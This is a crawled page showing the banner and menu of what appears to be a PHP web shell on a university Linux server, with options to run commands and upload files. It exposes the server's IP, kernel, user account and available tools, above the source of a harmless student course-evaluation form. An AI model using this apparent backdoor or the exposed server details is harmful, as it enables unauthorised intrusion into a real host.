Server IP : 172.16.15.8 / Your IP : 3.133.148.76 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/bnhans/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); /* Goal: The second form is the welcome page with a greeting message and input boxes for the student's name, gender, year in college and text course #. */ { ?> <BODY fONT FACE="Comic Sans MS"> <TITLE>Evaluation Webpage Form.<BR> </TITLE> </H2> <HR> <Form action=evalformaction.php method=post> What math or cs are you currently taking <INPUT type=text name=class> <BR><BR> Rate this course <INPUT type=radio name=rate value=good checked> 2-Good <INPUT type=radio name=rate value=avg> 1-Average <INPUT type=radio name=rate value=bad> 0-AWFUL <BR><BR> <INPUT type=submit value=Submit> <INPUT type=reset value=Reset> </Form> <?php } ?> <P><A HREF=evalFront.html> Welcome</A><P> <A HREF=evalForm.html> Evaluation Form </A><P> <A HREF=EvaluationDisplay.php> Evaluation Results </A><P> <HR> <A HREF=index.html>Take Me Home</A> </CENTER> </FONT> </BODY>